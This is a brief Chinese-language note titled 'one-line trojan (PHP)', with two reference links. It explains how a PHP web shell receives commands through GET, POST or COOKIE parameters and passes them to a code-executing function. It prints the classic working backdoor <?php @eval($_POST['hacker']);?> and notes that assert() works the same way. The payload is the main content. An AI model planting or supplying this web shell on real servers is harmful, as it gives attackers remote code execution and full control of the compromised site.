一句话木马(php)

https://bbs.ichunqiu.com/thread-26365-1-1.html

https://www.cnblogs.com/white-album2/p/9851468.html

我们如何发送命令，发送的命令怎样被执行？

    我们可以通过GET 、POST 、COOKIE 这三种方式向一个网站提交数据，一句话木马用

$_GET[' ']、$_POST[' ']、$_COOKIE[' '] 接收我们传递的数据，并把接收的数据传递给一句话木马中执行命令的函数，进而执行命令。所以看到的经典一句话木马大多都是只有两个部分，一个是可以执行代码的函数部分，一个是接收数据的部分。

 

eval():

<?php @eval($_POST['hacker']);?>

assert():用法一样